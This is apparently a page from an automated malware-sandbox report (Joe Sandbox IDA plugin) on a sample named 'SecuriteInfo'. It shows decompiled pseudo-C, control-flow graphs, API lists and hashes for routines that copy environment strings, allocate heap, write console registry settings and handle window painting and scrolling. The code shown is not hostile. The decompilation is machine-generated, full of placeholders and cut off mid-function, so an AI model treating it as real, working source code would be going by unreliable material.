    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: ExceptionFilterUnhandled
    • String ID:
    • API String ID: 3192549508-0
    • Opcode ID: 84b1f90e2a5c7fff7b68d1e2facaa39502e22539816fed6b3f3765ab339bfc50
    • Instruction ID: bd0aed3192c0b08e5becb67eff93d20a76d4b4cec37685fde3edfac80af7f216
    • Opcode Fuzzy Hash: 84b1f90e2a5c7fff7b68d1e2facaa39502e22539816fed6b3f3765ab339bfc50
    • Instruction Fuzzy Hash:
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 100%
    			E001B5AE0() {
    				WCHAR* _t1;
    				void* _t3;
    				void* _t17;
    				WCHAR* _t19;
    
    				_t1 = GetEnvironmentStringsW();
    				_t19 = _t1;
    				if(_t19 != 0) {
    					_t11 = E001B5B2E(_t19) - _t19 & 0xfffffffe;
    					_t3 = E001B48CE(E001B5B2E(_t19) - _t19 & 0xfffffffe); // executed
    					_t17 = _t3;
    					if(_t17 != 0) {
    						E001AF6B0(_t17, _t19, _t11);
    					}
    					E001B36C3(0);
    					FreeEnvironmentStringsW(_t19);
    					return _t17;
    				} else {
    					return _t1;
    				}
    			}







    0x001b5ae3
    0x001b5ae9
    0x001b5aed
    0x001b5afd
    0x001b5b01
    0x001b5b06
    0x001b5b0c
    0x001b5b11
    0x001b5b16
    0x001b5b1b
    0x001b5b22
    0x001b5b2d
    0x001b5af0
    0x001b5af0
    0x001b5af0

    APIs
    • GetEnvironmentStringsW.KERNEL32(?,001B0B46), ref: 001B5AE3
    • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,001B0B46), ref: 001B5B22
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: EnvironmentStrings$Free
    • String ID:
    • API String ID: 3328510275-0
    • Opcode ID: 050eb4e87e5df8cf453bed8cce2823a555da305d8f00015f75d5dcb380d3121d
    • Instruction ID: 40facae70881f0cedbdff4d165992725779064c63e96263a1f7b11b3d09f81fd
    • Opcode Fuzzy Hash: 050eb4e87e5df8cf453bed8cce2823a555da305d8f00015f75d5dcb380d3121d
    • Instruction Fuzzy Hash: 58E0922B649A2137932133B97C89EEB1E1ECFD27757250225F41596287EF148D8240F5
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 128 1b4871-1b487c 129 1b488a-1b4890 128->129 130 1b487e-1b4888 128->130 132 1b48a9-1b48ba RtlAllocateHeap 129->132 133 1b4892-1b4893 129->133 130->129 131 1b48be-1b48c9 call 1b47e4 130->131 138 1b48cb-1b48cd 131->138 134 1b48bc 132->134 135 1b4895-1b489c call 1b0efd 132->135 133->132 134->138 135->131 141 1b489e-1b48a7 call 1b39ff 135->141 141->131 141->132
    C-Code - Quality: 100%
    			E001B4871(signed int _a4, signed int _a8) {
    				void* _t8;
    				void* _t12;
    				signed int _t13;
    				signed int _t18;
    				long _t19;
    
    				_t18 = _a4;
    				if(_t18 == 0) {
    					L2:
    					_t19 = _t18 * _a8;
    					if(_t19 == 0) {
    						_t19 = _t19 + 1;
    					}
    					while(1) {
    						_t8 = RtlAllocateHeap( *0x1c62dc, 8, _t19); // executed
    						if(_t8 != 0) {
    							break;
    						}
    						__eflags = E001B0EFD();
    						if(__eflags == 0) {
    							L8:
    							 *((intOrPtr*)(E001B47E4())) = 0xc;
    							__eflags = 0;
    							return 0;
    						}
    						_t12 = E001B39FF(__eflags, _t19);
    						__eflags = _t12;
    						if(_t12 == 0) {
    							goto L8;
    						}
    					}
    					return _t8;
    				}
    				_t13 = 0xffffffe0;
    				if(_t13 / _t18 < _a8) {
    					goto L8;
    				}
    				goto L2;
    			}








    0x001b4877
    0x001b487c
    0x001b488a
    0x001b488a
    0x001b4890
    0x001b4892
    0x001b4892
    0x001b48a9
    0x001b48b2
    0x001b48ba
    0x00000000
    0x00000000
    0x001b489a
    0x001b489c
    0x001b48be
    0x001b48c3
    0x001b48c9
    0x00000000
    0x001b48c9
    0x001b489f
    0x001b48a5
    0x001b48a7
    0x00000000
    0x00000000
    0x001b48a7
    0x00000000
    0x001b48a9
    0x001b4882
    0x001b4888
    0x00000000
    0x00000000
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,001B278A,00000001,00000364,00000000,00000007,000000FF,?,?,001B47E9,001B36F8), ref: 001B48B2
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: fb9ed8ccf4c6caacf9f31d2cdff59ee98080ad1aa6ad6dc753b87f869a753392
    • Instruction ID: 80027e9cdaf24549dac4fd288b678cd230d30b157aca2310519cfee81b112edb
    • Opcode Fuzzy Hash: fb9ed8ccf4c6caacf9f31d2cdff59ee98080ad1aa6ad6dc753b87f869a753392
    • Instruction Fuzzy Hash: 6FF0E9322445B47FEB216BA1AC05BEA3B9DAF51760B15C521EC05D6092CF61DC0086E0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 144 1b48ce-1b48da 145 1b490c-1b4917 call 1b47e4 144->145 146 1b48dc-1b48de 144->146 153 1b4919-1b491b 145->153 148 1b48e0-1b48e1 146->148 149 1b48f7-1b4908 RtlAllocateHeap 146->149 148->149 150 1b490a 149->150 151 1b48e3-1b48ea call 1b0efd 149->151 150->153 151->145 156 1b48ec-1b48f5 call 1b39ff 151->156 156->145 156->149
    C-Code - Quality: 100%
    			E001B48CE(long _a4) {
    				void* _t4;
    				void* _t6;
    				long _t8;
    
    				_t8 = _a4;
    				if(_t8 > 0xffffffe0) {
    					L7:
    					 *((intOrPtr*)(E001B47E4())) = 0xc;
    					__eflags = 0;
    					return 0;
    				}
    				if(_t8 == 0) {
    					_t8 = _t8 + 1;
    				}
    				while(1) {
    					_t4 = RtlAllocateHeap( *0x1c62dc, 0, _t8); // executed
    					if(_t4 != 0) {
    						break;
    					}
    					__eflags = E001B0EFD();
    					if(__eflags == 0) {
    						goto L7;
    					}
    					_t6 = E001B39FF(__eflags, _t8);
    					__eflags = _t6;
    					if(_t6 == 0) {
    						goto L7;
    					}
    				}
    				return _t4;
    			}






    0x001b48d4
    0x001b48da
    0x001b490c
    0x001b4911
    0x001b4917
    0x00000000
    0x001b4917
    0x001b48de
    0x001b48e0
    0x001b48e0
    0x001b48f7
    0x001b4900
    0x001b4908
    0x00000000
    0x00000000
    0x001b48e8
    0x001b48ea
    0x00000000
    0x00000000
    0x001b48ed
    0x001b48f3
    0x001b48f5
    0x00000000
    0x00000000
    0x001b48f5
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000000,?,?,?,001B5E38,?,?,?,001A56F0), ref: 001B4900
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: f560c7b53474cbac61fc7d8de1fd881d7d35650458ebedbe4cbe1822261e15dd
    • Instruction ID: 8df4b4e3318417ae9d346b5ed5263b060a41496b09c94dbe8f6e495bd660c781
    • Opcode Fuzzy Hash: f560c7b53474cbac61fc7d8de1fd881d7d35650458ebedbe4cbe1822261e15dd
    • Instruction Fuzzy Hash: 13E0ED352402A46BEB2136E59C00BEB3A4C9B1A3A4F158122EC15921D3CF20CC10C1A0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 292 1ac4c0-1ac4d8 293 1ac4f9 292->293 294 1ac4de-1ac4f6 call 1a3370 292->294 296 1ac503-1ac527 293->296 294->293 299 1ac52d-1ac531 296->299 300 1ac5e1-1ac5e5 296->300 303 1ac556-1ac5c5 wsprintfW RegSetValueExW 299->303 304 1ac537-1ac550 299->304 301 1ac5eb-1ac5f7 300->301 302 1ac5fd-1ac643 RegSetValueExW 300->302 301->302 306 1ac646-1ac64a 301->306 302->306 305 1ac5c8-1ac5dc 303->305 304->303 304->305 305->296 308 1ac662-1ac6a8 RegSetValueExW 306->308 309 1ac650-1ac65c 306->309 310 1ac6ab-1ac6af 308->310 309->308 309->310 311 1ac6c7-1ac710 RegSetValueExW 310->311 312 1ac6b5-1ac6c1 310->312 313 1ac713-1ac717 311->313 312->311 312->313 314 1ac74a-1ac79d lstrlenW RegSetValueExW 313->314 315 1ac71d-1ac744 lstrcmpW 313->315 316 1ac7a0-1ac7a4 314->316 315->314 315->316 317 1ac7aa-1ac7b6 316->317 318 1ac7bc-1ac805 RegSetValueExW 316->318 317->318 319 1ac808-1ac80c 317->319 318->319 320 1ac812-1ac81e 319->320 321 1ac836-1ac8ec GetDpiForSystem MulDiv GetDpiForSystem MulDiv RegSetValueExW 319->321 320->321 322 1ac824-1ac830 320->322 323 1ac8ef-1ac8f3 321->323 322->321 322->323 324 1ac90b-1ac954 RegSetValueExW 323->324 325 1ac8f9-1ac905 323->325 326 1ac957-1ac95b 324->326 325->324 325->326 327 1ac970-1ac9b6 RegSetValueExW 326->327 328 1ac961-1ac96a 326->328 329 1ac9b9-1ac9bd 327->329 328->327 328->329 330 1ac9d2-1aca18 RegSetValueExW 329->330 331 1ac9c3-1ac9cc 329->331 332 1aca1b-1aca1f 330->332 331->330 331->332 333 1aca34-1aca7a RegSetValueExW 332->333 334 1aca25-1aca2e 332->334 335 1aca7d-1aca81 333->335 334->333 334->335 336 1aca96-1acadc RegSetValueExW 335->336 337 1aca87-1aca90 335->337 338 1acadf-1acae3 336->338 337->336 337->338 339 1acaf8-1acb3e RegSetValueExW 338->339 340 1acae9-1acaf2 338->340 341 1acb41-1acb45 339->341 340->339 340->341 342 1acb5a-1acba0 RegSetValueExW 341->342 343 1acb4b-1acb54 341->343 344 1acba3-1acba7 342->344 343->342 343->344 345 1acbcb-1acc2d RegSetValueExW 344->345 346 1acbad-1acbb6 344->346 348 1acc30-1acc34 345->348 346->345 347 1acbbc-1acbc5 346->347 347->345 347->348 349 1acc3a-1acc46 348->349 350 1acc4c-1acc92 RegSetValueExW 348->350 349->350 351 1acc95-1acc99 349->351 350->351 352 1acc9f-1acca8 351->352 353 1accbd-1acd1f RegSetValueExW 351->353 352->353 354 1accae-1accb7 352->354 355 1acd22-1acd2b 353->355 354->353 354->355
    APIs
    • wsprintfW.USER32 ref: 001AC573
    • RegSetValueExW.ADVAPI32 ref: 001AC5BF
    • RegSetValueExW.ADVAPI32 ref: 001AC63D
    • RegSetValueExW.ADVAPI32 ref: 001AC6A2
      • Part of subcall function 001A3370: GetDpiForSystem.USER32 ref: 001A33DC
      • Part of subcall function 001A3370: MulDiv.KERNEL32 ref: 001A33F5
      • Part of subcall function 001A3370: GetDpiForSystem.USER32 ref: 001A3406
      • Part of subcall function 001A3370: MulDiv.KERNEL32 ref: 001A341F
    • RegSetValueExW.ADVAPI32 ref: 001AC70A
    • lstrcmpW.KERNEL32 ref: 001AC738
    • lstrlenW.KERNEL32 ref: 001AC755
    • RegSetValueExW.ADVAPI32 ref: 001AC797
    • RegSetValueExW.ADVAPI32 ref: 001AC7FF
    • GetDpiForSystem.USER32 ref: 001AC836
    • MulDiv.KERNEL32 ref: 001AC851
    • GetDpiForSystem.USER32 ref: 001AC860
    • MulDiv.KERNEL32 ref: 001AC87B
    • RegSetValueExW.ADVAPI32 ref: 001AC8E6
    • RegSetValueExW.ADVAPI32 ref: 001AC94E
    • RegSetValueExW.ADVAPI32 ref: 001AC9B0
    • RegSetValueExW.ADVAPI32 ref: 001ACA12
    • RegSetValueExW.ADVAPI32 ref: 001ACA74
    • RegSetValueExW.ADVAPI32 ref: 001ACAD6
    • RegSetValueExW.ADVAPI32 ref: 001ACB38
    • RegSetValueExW.ADVAPI32 ref: 001ACB9A
    • RegSetValueExW.ADVAPI32 ref: 001ACC27
    • RegSetValueExW.ADVAPI32 ref: 001ACC8C
    • RegSetValueExW.ADVAPI32 ref: 001ACD19
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: Value$System$lstrcmplstrlenwsprintf
    • String ID: ColorTable%02d$CursorSize$CursorVisible$EditionMode$FaceName$FontPitchFamily$FontSize$FontWeight$HistoryBufferSize$HistoryNoDup$InsertMode$MenuMask$PopupColors$QuickEdit$ScreenBufferSize$ScreenColors$WindowSize$`
    • API String ID: 4202061470-2238697219
    • Opcode ID: 858543aeedf44c15cb85f22552e99783cc4310e3ef2b7b7576a591d04893ea7c
    • Instruction ID: a3943021e2eb4a90a00026d45a18f731758f7e6a14e630a034b08b7a3ed1a1a0
    • Opcode Fuzzy Hash: 858543aeedf44c15cb85f22552e99783cc4310e3ef2b7b7576a591d04893ea7c
    • Instruction Fuzzy Hash: 0232B0B4904259DFDB14DF58C484BAEBBF0FB48314F00896EE9599B250D774EA88CF92
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 356 1a8e70-1a8ea6 357 1a8ef8-1a8f2c 356->357 358 1a8eac-1a8ec1 356->358 360 1a8f32-1a8f3c 357->360 361 1a9091-1a90b2 call 1a6c30 357->361 358->357 359 1a8ec7-1a8ed4 358->359 362 1a8eda-1a8ef2 IsWindowVisible 359->362 363 1a90b9-1a90ed 359->363 360->361 364 1a8f42-1a8f4f 360->364 361->363 362->357 362->363 366 1a911d-1a91c9 GetWindowLongW AdjustWindowRect 363->366 367 1a90f3-1a9102 363->367 364->361 368 1a8f55-1a8f70 GetDC 364->368 371 1a91cf-1a927c GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 366->371 372 1a9281-1a92a5 ShowScrollBar 366->372 367->366 370 1a9108-1a9117 367->370 373 1a8f7b-1a900e CreateCompatibleBitmap ReleaseDC SelectObject 368->373 374 1a8f76 368->374 370->366 375 1a94bb-1a94d3 370->375 376 1a92a8-1a92b4 371->376 372->376 378 1a902c-1a908e SetRect call 1ab280 373->378 379 1a9014-1a9029 DeleteObject 373->379 377 1a9939-1a993e 374->377 382 1a94d9-1a94f1 375->382 383 1a94f7-1a95fc ScrollWindow SetScrollPos * 2 InvalidateRect 375->383 380 1a936a-1a938e ShowScrollBar 376->380 381 1a92ba-1a9365 GetSystemMetrics SetScrollRange SetScrollPos ShowScrollBar 376->381 378->361 379->378 385 1a9391-1a94b6 SetWindowPos SystemParametersInfoW GetSystemMetrics InvalidateRect UpdateWindow 380->385 381->385 382->383 386 1a95ff 382->386 383->386 388 1a9604-1a964e 385->388 386->388 389 1a977f-1a9783 388->389 390 1a9654-1a966c 388->390 392 1a9789-1a979e 389->392 393 1a97a4-1a97c4 call 1ab420 389->393 390->389 391 1a9672-1a977c call 1ab280 call 1a6c30 InvalidateRect UpdateWindow 390->391 391->389 392->393 395 1a97c7-1a97dc 392->395 393->395 399 1a97e2-1a9810 GetFocus 395->399 400 1a9893-1a9897 395->400 404 1a988e 399->404 405 1a9816-1a9823 399->405 402 1a989d-1a98bd call 1a78e0 400->402 403 1a98e1-1a9926 call 1a78e0 call 1aa510 400->403 402->403 415 1a98c3-1a98db 402->415 418 1a9929-1a9932 403->418 404->400 409 1a9829-1a987e CreateCaret call 1aa510 405->409 410 1a9883 DestroyCaret 405->410 411 1a9889 409->411 410->411 411->404 415->403 415->418 418->377
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.265490341.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000000.00000002.265486347.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265503610.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265511296.00000000001C4000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.265516218.00000000001C9000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_1a0000_SecuriteInfo.jbxd
    Similarity
    • API ID: Scroll$Window$Rect$ShowSystem$Metrics$CaretCreateInvalidateObjectRangeUpdate$AdjustBitmapCompatibleDeleteDestroyFocusInfoLongParametersReleaseSelectVisible
    • String ID:
    • API String ID: 3288602422-0
    • Opcode ID: f7132b60c0908bf3fb50e3fc316b5d6ccaae743163a8798d62b66ddf01e67e0b
    • Instruction ID: 7d6b5b92c4fdc9c65c71b1933dd4866fdb93306742dffa4b90dc04796289a69a
    • Opcode Fuzzy Hash: f7132b60c0908bf3fb50e3fc316b5d6ccaae743163a8798d62b66ddf01e67e0b
    • Instruction Fuzzy Hash: 90728078604205DFC704DF68C198AA9BBF1FF48354F1585ADE889CB362DB35E985CB81
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 20%
    			E001A34E0(struct HWND__* _a4, int _a8, signed int _a12, unsigned int _a16) {
    				long _v20;
    				long _v24;
    				struct tagPAINTSTRUCT _v88;
    				struct HDC__* _v92;
    				int _v96;
    				long _v100;
    				int _v104;
    				long _v108;
    				int _v112;
    				struct tagPOINT _v120;
    				int _v124;
    				int _v128;
    				int _v132;
    				intOrPtr _v136;
    				signed int _v140;
    				int _v144;
    				intOrPtr _v148;
    				signed int _v152;
    				void _v156;
    				intOrPtr _v160;
    				int _v164;
    				struct HDC__** _v168;
    				long _v172;
    				long _v176;
    				long _v180;
    				long _v184;
    				long _v188;
    				long _v192;
    				signed int _v196;
    				signed int _v200;
    				signed int _v204;
    				signed int _v208;
    				signed int _v212;
    				signed int _v216;
    				signed int _v220;
    				signed int _v224;
    				signed int _v228;
    				signed int _v232;
    				signed int _v236;
    				signed int _v240;
    				intOrPtr _v244;
    				intOrPtr _v248;
    				void* _v260;
    				void* _v264;
    				void* _v268;
    				void* _v272;
    				int _v276;
    				struct HWND__* _v280;
    				signed int _v284;
    				unsigned int _v288;
    				long _v292;
    				int _v296;
    				struct HDC__* _v324;
    				void* __edi;
    				void* __ebp;
    				intOrPtr* _t625;
    				long _t627;
    				int _t628;
    				long _t639;
    				struct HDC__** _t641;
    				signed int _t645;
    				long _t667;
    				intOrPtr _t669;
    				long _t678;
    				intOrPtr _t680;
    				long _t684;
    				long _t725;
    				struct HDC__** _t727;
    				long _t739;
    				struct HDC__** _t743;
    				long _t753;
    				intOrPtr _t755;
    				long _t763;
    				signed int _t764;
    				long _t776;
    				struct HDC__** _t778;
    				long _t791;
    				signed short _t792;
    				signed int _t799;
    				long _t824;
    				signed short _t825;
    				signed int _t832;
    				long _t860;
    				struct HMENU__* _t868;
    				long _t872;
    				struct HDC__** _t879;
    				struct HWND__* _t880;
    				struct HDC__** _t882;
    				struct HDC__** _t892;
    				long _t895;
    				struct HDC__** _t902;
    				struct HDC__** _t904;
    				struct HDC__** _t906;
    				struct HDC__* _t910;
    				struct HDC__** _t922;
    				struct HDC__** _t928;
    				long _t931;
    				struct HDC__** _t938;
    				struct HWND__* _t939;
    				struct HDC__** _t941;
    				struct HDC__** _t950;
    				long _t960;
    				intOrPtr _t1000;
    				signed int _t1016;
    				intOrPtr _t1048;
    				intOrPtr _t1052;
    				signed int _t1056;
    				intOrPtr _t1061;
    				intOrPtr _t1065;
    				signed int _t1069;
    				long _t1080;
    				signed int _t1083;
    				long _t1101;
    				signed int _t1104;
    				struct HDC__** _t1115;
    				intOrPtr _t1124;
    				signed int _t1133;
    				signed char _t1144;
    				intOrPtr _t1166;
    				void* _t1169;
    				intOrPtr* _t1195;
    				struct HDC__** _t1196;
    				struct HWND__** _t1203;
    				struct HWND__** _t1226;
    
    				_t625 = _t1195;
    				 *_t625 = _a4;
    				 *(_t625 + 4) = 0;
    				_t627 = GetWindowLongW(??, ??);
    				_t1196 = _t1195 - 8;
    				_v24 = _t627;
    				_t628 = _a8;
    				_v160 = _t628;
    				if(_t628 == 1) {
    					_v20 = L001A8D50(_a4, _a16);
    				} else {
    					if(_v160 == 2) {
    						 *(_v24 + 0xa8) = 0;
    						PostQuitMessage(0);
    						goto L193;
    					} else {
    						if(_v160 == 5) {
    							_t639 = _v24;
    							__eflags =  *(_t639 + 0x84);
    							if( *(_t639 + 0x84) != 0) {
    								_t641 =  *(_v24 + 0x84);
    								__eflags = _t641[0x19] - 2;
    								if(_t641[0x19] != 2) {
    									_t645 = _a16 >> 0x00000010 & 0xffff;
    									_t1016 =  *( *((intOrPtr*)(_v24 + 8)) + 0x82);
    									asm("cdq");
    									__eflags = _t645 / _t1016 - 0x14;
    									if(_t645 / _t1016 <= 0x14) {
    										_v196 = 0x14;
    									} else {
    										asm("cdq");
    										_v196 = (_a16 >> 0x00000010 & 0xffff) /  *( *((intOrPtr*)(_v24 + 8)) + 0x82);
    									}
    									_v200 = _v196;
    									asm("cdq");
    									__eflags = (_a16 & 0xffff) /  *( *((intOrPtr*)(_v24 + 8)) + 0x80) - 0x14;
    									if(__eflags <= 0) {
    										_v204 = 0x14;
    									} else {
    										asm("cdq");
    										_v204 = (_a16 & 0xffff) /  *( *((intOrPtr*)(_v24 + 8)) + 0x80);
    									}
    									_v292 = _v24;
    									_v288 = _v204;
    									_v284 = _v200;
    									E001AA5D0(__eflags);
    								}
    							}
    							goto L193;
    						} else {
    							if(_v160 == 7) {
    								_t667 = _v24;
    								__eflags =  *(_t667 + 0x84);
    								if( *(_t667 + 0x84) != 0) {
    									_t669 =  *((intOrPtr*)(_v24 + 8));
    									__eflags =  *(_t669 + 0x18);
    									if( *(_t669 + 0x18) != 0) {
    										CreateCaret( *(_v24 + 0xa8), ( *(_v24 + 0x84))[4],  *( *((intOrPtr*)(_v24 + 8)) + 0x80),  *( *((intOrPtr*)(_v24 + 8)) + 0x82));
    										_v292 = _v24;
    										E001AA510();
    									}
    								}
    								goto L193;
    							} else {
    								if(_v160 == 8) {
    									_t678 = _v24;
    									__eflags =  *(_t678 + 0x84);
    									if( *(_t678 + 0x84) != 0) {
    										_t680 =  *((intOrPtr*)(_v24 + 8));
    										__eflags =  *(_t680 + 0x18);
    										if( *(_t680 + 0x18) != 0) {
    											DestroyCaret();
    										}
    									}
    									goto L193;
    								} else {
    									if(_v160 == 0xf) {
    										_t684 = _v24;
    										__eflags =  *(_t684 + 0x84);
    										if( *(_t684 + 0x84) != 0) {
    											BeginPaint( *(_v24 + 0xa8),  &_v88);
    											_v164 =  *( *((intOrPtr*)(_v24 + 8)) + 0x74) *  *( *((intOrPtr*)(_v24 + 8)) + 0x82);
    											BitBlt(_v88.hdc, 0, 0, ( *( *((intOrPtr*)(_v24 + 8)) + 0x78) -  *( *((intOrPtr*)(_v24 + 8)) + 0x70) + 1) *  *( *((intOrPtr*)(_v24 + 8)) + 0x80), ( *( *((intOrPtr*)(_v24 + 8)) + 0x7c) -  *( *((intOrPtr*)(_v24 + 8)) + 0x74) + 1) *  *( *((intOrPtr*)(_v24 + 8)) + 0x82),  *( *(_v24 + 0x84)),  *( *((intOrPtr*)(_v24 + 8)) + 0x70) *  *( *((intOrPtr*)(_v24 + 8)) + 0x80), _v164, 0xcc0020);
    											_t1203 = _t1196 - 0xffffffffffffffe4;
    											__eflags = ( *(_v24 + 0x84))[5];
    											if(__eflags != 0) {
    												 *_t1203 = _v24;
    												_v324 = _v88;
    												E001A9950(__eflags);
    												_t1203 = _t1203 - 8;
    											}
    											 *_t1203 =  *(_v24 + 0xa8);
    											_v324 =  &_v88;
    											EndPaint(??, ??);
    										} else {
    										}
    										goto L193;
    									} else {
    										if(_v160 == 0x18) {
    											_t725 = _v24;
    											__eflags =  *(_t725 + 0x84);
    											if( *(_t725 + 0x84) != 0) {
    												__eflags = _a12;
    												if(_a12 == 0) {
    													_t727 =  *(_v24 + 0x84);
    													__eflags = _t727[1];
    													if(_t727[1] != 0) {
    														DeleteObject(( *(_v24 + 0x84))[1]);
    													}
    													( *(_v24 + 0x84))[1] = 0;
    												} else {
    													_v292 = _v24;
    													E001A8E70();
    												}
    											} else {
    											}
    											goto L193;
    										} else {
    											if(_v160 + 0xffffff00 - 2 < 0) {
    												_t739 = _v24;
    												__eflags =  *(_t739 + 0x84);
    												if( *(_t739 + 0x84) == 0) {
    													L74:
    													__eflags = _a8 - 0x100;
    													_t1144 = (_t1133 & 0xffffff00 | _a8 == 0x00000100) & 0x00000001;
    													__eflags = _t1144;
    													_v292 = _v24;
    													_v288 = _t1144 & 0x000000ff;
    													_v284 = _a12;
    													_v280 = _a16;
    													E001A9F10(_t1169, _t1144);
    												} else {
    													_t743 =  *(_v24 + 0x84);
    													__eflags = _t743[5];
    													if(_t743[5] == 0) {
    														goto L74;
    													} else {
    														__eflags = _a8 - 0x100;
    														_v292 = _v24;
    														_v288 = (_t1133 & 0xffffff00 | _a8 == 0x00000100) & 1;
    														_v284 = _a12;
    														_v280 = _a16;
    														E001A9A80();
    													}
    												}
    												goto L193;
    											} else {
    												if(_v160 + 0xfffffefc - 2 < 0) {
    													__eflags = _a8 - 0x104;
    													_v292 = _v24;
    													_v288 = (_t1133 & 0xffffff00 | __eflags == 0x00000000) & 1;
    													_v284 = _a12;
    													_v280 = _a16;
    													E001A9F10(_t1169, __eflags);
    													goto L193;
    												} else {
    													if(_v160 == 0x111) {
    														_t753 = _v24;
    														__eflags =  *(_t753 + 0x84);
    														if( *(_t753 + 0x84) != 0) {
    															_t755 = _a12 + 0xfffffeff;
    															_v248 = _t755;
    															__eflags = _t755 - 0x14;
    															if(_t755 - 0x14 <= 0) {
    																goto __eax;
    															}
    															_v20 = DefWindowProcW(_a4, _a8, _a12, _a16);
    														} else {
    															goto L193;
    														}
    													} else {
    														if(_v160 == 0x112) {
    															_t763 = _v24;
    															__eflags =  *(_t763 + 0x84);
    															if( *(_t763 + 0x84) != 0) {
    																_t764 = _a12;
    																_v244 = _t764;
    																__eflags = _t764 == 0x101;
    																if(_t764 == 0x101) {
    																	_v292 = _v24;
    																	_v288 = 0;
    																	E001AA680(_t1169);
    																	goto L182;
    																} else {
    																	__eflags = _v244 == 0x102;
    																	if(_v244 == 0x102) {
    																		_v292 = _v24;
    																		_v288 = 1;
    																		E001AA680(_t1169);
    																		L182:
    																		goto L193;
    																	} else {
    																		_v20 = DefWindowProcW(_a4, _a8, _a12, _a16);
    																	}
    																}
    															} else {
    																goto L193;
    															}
    														} else {
    															if(_v160 == 0x113) {
    																L54:
    																_t776 = _v24;
    																__eflags =  *(_t776 + 0x84);
    																if( *(_t776 + 0x84) != 0) {
    																	_t778 =  *(_v24 + 0x84);
    																	__eflags = _t778[0x19] - 1;
    																	if(_t778[0x19] == 1) {
    																		_v292 = _v24;
    																		E001A8E70();
    																	}
    																}
    																goto L193;
    															} else {
    																if(_v160 == 0x114) {
    																	_v136 =  *( *((intOrPtr*)(_v24 + 8)) + 0x78) -  *( *((intOrPtr*)(_v24 + 8)) + 0x70) + 1;
    																	_v140 =  *( *((intOrPtr*)(_v24 + 8)) + 0x70);
    																	_t791 = _v24;
    																	__eflags =  *(_t791 + 0x84);
    																	if( *(_t791 + 0x84) != 0) {
    																		_t792 = _a12;
    																		_v208 = _t792 & 0x0000ffff;
    																		__eflags = _t792 - 5;
    																		if(_t792 - 5 <= 0) {
    																			goto __eax;
    																		}
    																		__eflags = _v140;
    																		if(_v140 <= 0) {
